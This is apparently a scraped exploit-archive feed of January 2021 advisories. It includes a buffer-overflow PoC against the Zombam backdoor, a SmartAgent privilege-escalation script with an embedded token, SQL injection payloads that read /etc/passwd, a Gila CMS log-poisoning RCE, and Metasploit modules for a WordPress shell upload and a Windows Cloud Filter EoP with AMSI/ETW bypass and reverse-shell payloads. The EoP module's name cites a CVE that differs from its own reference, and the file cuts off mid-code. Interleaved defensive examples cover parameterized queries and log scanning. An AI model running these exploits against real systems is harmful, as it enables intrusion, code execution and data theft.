
jSQL Injection 0.83 Source Code Release


jSQL Injection is a lightweight application used to find database information on a remote server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions such as Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.


MD5 | ff856f45b190724cb5f562e78e919396



Backdoor.Win32.Zombam.a Remote Stack Buffer Overflow


Backdoor.Win32.Zombam.a malware suffers from a remote stack buffer overflow vulnerability.


MD5 | 1d4c04985317d4a19cc3d4abc3ead48f

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/6c5081e9b65a52963b0b1ae612ef7eb4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zombam.a
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 80; sending an HTTP GET request of 300 or more bytes triggers a stack buffer overflow that overwrites EIP.
Type: PE32
MD5: 6c5081e9b65a52963b0b1ae612ef7eb4
Vuln ID: MVID-2021-0022
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/11/2021

Memory Dump:
0:004> .ecxr
eax=00000000 ebx=03f90350 ecx=852341b4 edx=00000000 esi=047efb55 edi=047efc8b
eip=41414141 esp=047efab8 ebp=047eff80 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
41414141 ?? ???

FAULTING_IP:
+24
41414141 ?? ???

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME: Backdoor.Win32.Zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 41414141

READ_ADDRESS: 41414141

FOLLOWUP_IP:
+24
41414141 ?? ???

FAILED_INSTRUCTION_ADDRESS:
+24
41414141 ?? ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER: from 41414141 to 41414141

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_STACKIMMUNE

DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_STACKIMMUNE

IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:
00000000 00000000 unknown!backdoor.win32.zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe+0x0


STACK_COMMAND: .cxr 00000000047EF658 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME: unknown!backdoor.win32.zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: unknown

IMAGE_NAME: unknown

DEBUG_FLR_IMAGE_TIMESTAMP: 0

FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_STACKIMMUNE_c0000005_unknown!Unloaded

BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_unknown!backdoor.win32.zombam.a.6c5081e9b65a52963b0b1ae612ef7eb4.exe


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

PACKET="GET /"+"A"*300+"HTTP/1.0\r\nHost: "+MALWARE_HOST

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
s.send(PACKET)
s.close()
print("Backdoor.Win32.Zombam.a / Remote Stack Buffer Overflow")
print("MD5: 6c5081e9b65a52963b0b1ae612ef7eb4")
print("By Malvuln")


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

SmartAgent 3.1.0 Privilege Escalation


SmartAgent version 3.1.0 suffers from a privilege escalation vulnerability.


MD5 | 07b8ed0a364728669f5a7d741a5a8c1d

# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation
# Date: 01-11-2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://www.smartagent.io/
# Version: Build 3.1.0
# Tested on: Windows 10/Kali Linux

A low-privilege user such as ViewOnly can create an account with SuperUser
permission.

Steps To Reproduce:
1. Create a user with ViewOnly
2. Visit https://demo.localhost.com/#/CampaignManager/users
3. Now you will be able to create an account with SuperUser.

#Python Exploit [Replace With Your Authorization Code]

import requests

session = requests.Session()

rawBody = "{\"username\":\"orion@hridoy.com\",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}"
headers = {
    "Authorization": "id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ",
    "Accept": "application/json, text/plain, */*",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Referer": "https://demo.localhost.com/",
    "Connection": "close",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "DNT": "1",
    "Content-Type": "application/json",
}
response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers)

print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")


Cemetery Mapping And Information System 1.0 SQL Injection


Cemetery Mapping and Information System version 1.0 suffers from multiple remote SQL injection vulnerabilities.


MD5 | 13b51c2660d3b63bd96411a4b133e165

# Exploit Title: Cemetery Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Author: Mesut Cetin
# Date: 2021-01-12
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "Search" bar (POST method)
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

SQL injection is a class of injection attack that makes it possible to execute attacker-chosen SQL statements. Because user input is not sanitized, the attacker can in this case read the entire database.

Explanation:

The file "person.php" reads user input from the search bar at line 45:

"$_POST['search']"

and uses it without any sanitization in the following SQL statement (lines 46-49):

$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
$mydb->setQuery($sql);
$cur = $mydb->executeQuery();
$numrows = $mydb->num_rows($cur);//get the number of count

A single quote (') entered in the search bar at http://localhost/CemeteryMapping/index.php?q=person results in SQL syntax errors.

Proof of Concept:

Since the PHP code does not sanitize user input, several SQL injection techniques work.

1. Boolean-based SQL injection

Send a POST request to /CemeteryMapping/index.php?q=person with the payload ' or 1=1 --:

search=' or 1=1 --

2. Union-based SQL injection

To retrieve sensitive files such as /etc/passwd, use the following payload in the search bar (POST request to http://localhost/CemeteryMapping/index.php?q=person):

search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -

To enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL expressions:

@@hostname : current hostname
@@tmpdir : temp directory
@@datadir : data directory
@@version : database version
@@basedir : base directory
user() : current user
database() : current database
version() : version
schema() : current database
UUID() : system UUID key
current_user() : current user
current_user : current user
system_user() : current system user
session_user() : session user
@@GLOBAL.have_symlink : whether symlinks are enabled
@@GLOBAL.have_ssl : whether SSL is available

3. Time-based SQL injection

For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -

Mitigation:

Using prepared statements with parameterized queries, so that the search value is bound as data rather than spliced into the SQL text, prevents this injection.
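The following is an added example, not code from the advisory or from the Cemetery Mapping project: it puts the advisory's concatenated LIKE query beside its parameterized form and runs the advisory's boolean payload through both. Python's sqlite3 stands in for PHP/mysqli, and the table contents are constructed; the payload is prefixed with a non-matching name ("zzz") so that the difference between the two queries shows in the row counts rather than being masked by the leading wildcard.

```python
import sqlite3

# Constructed in-memory table standing in for the application's tblpeople
# (added example; sqlite3 plays the role of PHP/mysqli here).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblpeople (ID INTEGER PRIMARY KEY, FNAME TEXT, LNAME TEXT)")
    conn.executemany(
        "INSERT INTO tblpeople (FNAME, LNAME) VALUES (?, ?)",
        [("Alice", "Smith"), ("Bob", "Jones"), ("Carol", "White")],
    )
    return conn

def search_vulnerable(conn, search):
    """Same construction as person.php: the raw search string is spliced into the SQL text."""
    sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%" + search + "%'"
    return conn.execute(sql).fetchall()

def search_parameterized(conn, search):
    """Prepared statement: the SQL text is fixed and the value travels as a bound
    parameter, so quotes and comment markers inside it are just characters to match."""
    sql = "SELECT * FROM tblpeople WHERE FNAME LIKE ?"
    return conn.execute(sql, ("%" + search + "%",)).fetchall()

def raises_sql_error(conn, search):
    """True if the concatenated query fails to parse (what a lone quote does to person.php)."""
    try:
        search_vulnerable(conn, search)
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    payload = "zzz' or 1=1 --"  # the advisory's boolean payload behind a non-matching prefix
    print("vulnerable:", len(search_vulnerable(db, payload)), "rows")        # 3: the OR 1=1 wins
    print("parameterized:", len(search_parameterized(db, payload)), "rows")  # 0: no such name
    print("lone quote breaks concatenated SQL:", raises_sql_error(db, "'"))  # True
```

The parameterized version also handles the legitimate case that the concatenated one cannot: a name containing an apostrophe is searched for literally instead of producing a syntax error.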

Gila CMS 2.0.0 Remote Code Execution


Gila CMS version 2.0.0 suffers from a remote code execution vulnerability.


MD5 | 9f905fd1f22c5584b0c7e5d809cb7793

# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Date: 1.12.2021
# Exploit Author: Enesdex
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
# Version: x < 2.0.0
# Tested on: Windows 10

import requests
import time

target_url = "http://192.168.1.101:80/Gila/"
cmd = "calc.exe"

url = target_url+"?c=admin"
cookies = {"GSESSIONID": "../../index.php"}
headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php'; ?>"}
requests.get(url, headers=headers, cookies=cookies)
time.sleep(5)
requests.get(target_url+"/index.php")


WordPress AIT CSV Import/Export 3.0.3 Shell Upload


WordPress AIT CSV Import/Export plugin versions 3.0.3 and below allow unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload handler neither requires authentication nor validates the uploaded content. It may return an error when attempting to parse the CSV, but the uploaded shell is left in place under wp-content/uploads/. The plugin does not need to be activated to be exploitable.


MD5 | c39ac90e0b404ac71d25decc4f495aec

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress AIT CSV Import Export Unauthenticated Remote Code Execution',
        'Description' => %q{
          The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and
          execute arbitrary PHP code. The upload-handler does not require authentication, nor does it validate
          the uploaded content. It may return an error when attempting to parse a CSV, however the
          uploaded shell is left. The shell is uploaded to wp-content/uploads/. The plugin is not
          required to be activated to be exploitable.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            # 0day according to wpvdb
            'h00die', # msf module
          ],
        'References' =>
          [
            [ 'URL', 'https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup' ],
            [ 'WPVDB', '10471' ]
          ],
        'Platform' => [ 'php' ],
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' =>
          [
            [
              'AIT CSV Import Export <3.0.4',
              {
                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
              }
            ]
          ],
        'DisclosureDate' => '2020-11-14', # 0day detected by wpvdb
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/'])
      ]
    )
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    # no readme file, just a changelog so we need the version from there
    changelog = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'ait-csv-import-export', 'changelog.txt')
    check_version_from_custom_file(changelog, /^v(\d\.\d\.\d),/, '3.0.4')
  end

  def exploit
    filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
    register_file_for_cleanup(filename)

    print_status("Uploading payload: #{filename}")

    post_data = Rex::MIME::Message.new
    post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'ait-csv-import-export', 'admin', 'upload-handler.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'data' => post_data.to_s
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

    print_status('Triggering payload')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', filename)
    )
  end
end
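Both of the web exploits above leave a recognisable trace in the web server's access log: the Gila CMS script plants PHP tags in the User-Agent so that the log file itself becomes executable, and the AIT CSV module POSTs directly to the plugin's upload-handler.php and then requests a .php file under wp-content/uploads/. The following is an added, defender-side example (not code from either exploit, from Gila CMS or from the Metasploit project) that parses Apache combined-format lines and flags those patterns; the log lines are constructed samples, and the rule names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format sample lines (not real traffic): one
# Gila-style poisoned User-Agent, one AIT CSV upload-handler POST, one
# request for a PHP file under wp-content/uploads/, and two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2021:10:15:01 +0000] "GET /Gila/?c=admin HTTP/1.1" 200 512 "-" "<?php echo 'poisoned'; ?>"
10.0.0.6 - - [12/Jan/2021:10:15:03 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jan/2021:10:16:10 +0000] "POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1" 200 87 "-" "python-requests/2.25.1"
10.0.0.8 - - [12/Jan/2021:10:16:12 +0000] "GET /wp-content/uploads/aB3dE9.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
10.0.0.9 - - [12/Jan/2021:10:17:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
AIT_UPLOAD_HANDLER = "/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php"
UPLOADS_PHP_RE = re.compile(r"/wp-content/uploads/.*\.php$", re.IGNORECASE)

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the names of every rule the entry trips (empty list if none)."""
    rules = []
    path = unquote(entry["path"]).split("?", 1)[0]
    ua = unquote(entry["ua"])
    # Gila CMS log poisoning: PHP code placed in a header that gets written to the log
    if PHP_TAG_RE.search(ua):
        rules.append("php-tag-in-user-agent")
    # traversal sequences in the request URL itself
    if "../" in path or "..\\" in path:
        rules.append("path-traversal")
    # AIT CSV Import/Export: a POST straight to the unauthenticated upload handler
    if entry["method"] == "POST" and path.endswith(AIT_UPLOAD_HANDLER):
        rules.append("ait-csv-upload-handler")
    # a PHP script being executed out of the uploads directory
    if UPLOADS_PHP_RE.search(path):
        rules.append("php-under-uploads")
    return rules

def scan(log_text):
    """Return [(client_ip, rule), ...] for every suspicious line in the log text."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in classify(entry):
            hits.append((entry["ip"], rule))
    return hits

if __name__ == "__main__":
    for ip, rule in scan(SAMPLE_LOG):
        print(f"{ip}\t{rule}")
```

The User-Agent rule is worth running over historical logs as well as live ones: the poisoned line is written on the first request, and the include that executes it can come any time later.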

Cloud Filter Arbitrary File Creation / Privilege Escalation


This Metasploit module exploits a vulnerability in cldflt.sys. The Cloud Filter driver on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.


MD5 | a3096153d5abb79b42ddbd4fd922a273

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  include Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Dotnet
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::FileSystem
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
        'Description' => %q{
          The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
          2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
          calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
          function with attacker controlled input. This meant that files were created with
          KernelMode permissions, thereby bypassing any security checks that would otherwise
          prevent a normal user from being able to create files in directories
          they don't have permissions to create files in.

          This module abuses this vulnerability to perform a DLL hijacking attack against the
          Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
          NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
          of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
          new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
          to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'James Foreshaw', # Vulnerability discovery and PoC creator
          'Grant Willcox' # Metasploit module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Privileged' => true,
        'Arch' => [ARCH_X64],
        'Targets' =>
          [
            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2020-03-10',
        'References' => [
          ['CVE', '2020-17136'],
          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']
        ],
        'Notes' =>
          {
            'SideEffects' => [ ARTIFACTS_ON_DISK ],
            'Reliability' => [ REPEATABLE_SESSION ],
            'Stability' => [ CRASH_SAFE ]
          },
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'process',
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
          }
      )
    )
    register_options(
      [
        OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),
        OptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]),
        OptInt.new('WAIT', [false, 'Time in seconds to wait', 5])
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false])
      ]
    )
  end

  def check_requirements(clr_req, installed_dotnet_versions)
    installed_dotnet_versions.each do |fi|
      if clr_req == 'v4.0.30319'
        if fi[0] == '4'
          vprint_status('Requirements ok')
          return true
        end
      elsif fi[0] == '3'
        vprint_status('Requirements ok')
        return true
      end
    end
    print_error('Required dotnet version not present')
    false
  end

  def check
    sysinfo_value = sysinfo['OS']
    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
    end

    build_num_raw = cmd_exec('cmd.exe /c ver')
    build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
    if build_num.nil?
      return CheckCode::Unknown("Couldn't retrieve the target's build number!")
    else
      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
      vprint_status("Target's build number: #{build_num}")
    end

    build_num_gemversion = Gem::Version.new(build_num)
    # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
    if (build_num_gemversion >= Gem::Version.new('10.0.19042.0')) && (build_num_gemversion < Gem::Version.new('10.0.19042.685')) # Windows 10 20H2
      return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.19041.0')) && (build_num_gemversion < Gem::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
      return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.1256')) # Windows 10 v1909
      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903
      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809
      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
    elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803
      return CheckCode::Appears('A vulnerable Windows 10 v1803 build was detected!')
    else
      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
    end
  end

  def exploit
    if sysinfo['Architecture'] != 'x64'
      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
    elsif session.arch != 'x64'
      fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
    end
    dir_junct_path = 'C:\\Windows\\Temp'
    intermediate_dir = rand_text_alpha(10).to_s
    junction_dir = rand_text_alpha(10).to_s
    path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"

    mkdir("#{path_to_intermediate_dir}")
    if !directory?("#{path_to_intermediate_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
    end
    register_dir_for_cleanup("#{path_to_intermediate_dir}")

    mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
    end

    mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
    end

    exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
    unless File.file?(exe_path)
      fail_with(Failure::BadConfig, 'Assembly not found')
    end
    installed_dotnet_versions = get_dotnet_versions
    vprint_status("Dot Net Versions installed on target: #{installed_dotnet_versions}")
    if installed_dotnet_versions == []
      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
    end
    if check_requirements('v4.0.30319', installed_dotnet_versions) == false
      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
    end
    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
    write_file(payload_path, generate_payload_dll)
    register_file_for_cleanup(payload_path)
    execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
    service_start('smphost')
    register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
    sleep(3)
    delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
  end

  def pid_exists(pid)
    mypid = client.sys.process.getpid.to_i

    if pid == mypid
      print_bad('Cannot select the current process as the injection target')
      return false
    end

    host_processes = client.sys.process.get_processes
    if host_processes.empty?
      print_bad('No running processes found on the target host.')
      return false
    end

    theprocess = host_processes.find { |x| x['pid'] == pid }

    !theprocess.nil?
  end

  def launch_process
    process_name = 'notepad.exe'
    print_status("Launching #{process_name} to host CLR...")

    process = client.sys.process.execute(process_name, nil, {
      'Channelized' => true,
      'Hidden' => true,
      'UseThreadToken' => true,
      'ParentPid' => 0
    })
    hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
    print_good("Process #{hprocess.pid} launched.")
    [process, hprocess]
  end

  def inject_hostclr_dll(process)
    print_status("Reflectively injecting the Host DLL into #{process.pid}..")

    library_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')
    library_path = ::File.expand_path(library_path)

    print_status("Injecting Host into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    [exploit_mem, offset]
  end

  def execute_assembly(exe_path, exe_args)
    if sysinfo.nil?
      fail_with(Failure::BadConfig, 'Session invalid')
    else
      print_status("Running module against #{sysinfo['Computer']}")
    end
    if datastore['WAIT'].zero?
      print_warning('Output unavailable as wait time is 0')
    end

    process, hprocess = launch_process
    exploit_mem, offset = inject_hostclr_dll(hprocess)

    assembly_mem = copy_assembly(exe_path, hprocess, exe_args)

    print_status('Executing...')
    hprocess.thread.create(exploit_mem + offset, assembly_mem)

    if datastore['WAIT'].positive?
      sleep(datastore['WAIT'])
      read_output(process)
    end

    if datastore['KILL']
      print_good("Killing process #{hprocess.pid}")
      client.sys.process.kill(hprocess.pid)
    end

    print_good('Execution finished.')
  end

  def copy_assembly(exe_path, process, exe_args)
    print_status("Host injected. Copy assembly into #{process.pid}...")
    int_param_size = 8
    sign_flag_size = 1
    amsi_flag_size = 1
    etw_flag_size = 1
    assembly_size = File.size(exe_path)

    cln_params = ''
    cln_params << exe_args
    cln_params << "\x00"

    payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size
    payload_size += assembly_size + cln_params.length
    assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)
    params = [
      assembly_size,
      cln_params.length,
      datastore['AMSIBYPASS'] ? 1 : 0,
      datastore['ETWBYPASS'] ? 1 : 0,
      2
    ].pack('IICCC')
    params += cln_params

    process.memory.write(assembly_mem, params + File.read(exe_path))
    print_status('Assembly copied.')
    assembly_mem
  end

  def read_output(process)
    print_status('Start reading output')
    old_timeout = client.response_timeout
    client.response_timeout = 5

    begin
      loop do
        output = process.channel.read
        if !output.nil? && !output.empty?
          output.split("\n").each { |x| print_good(x) }
        end
        break if output.nil? || output.empty?
      end
    rescue Rex::TimeoutError
      vprint_warning('Time out exception: wait limit exceeded (5 sec)')
    rescue ::StandardError => e
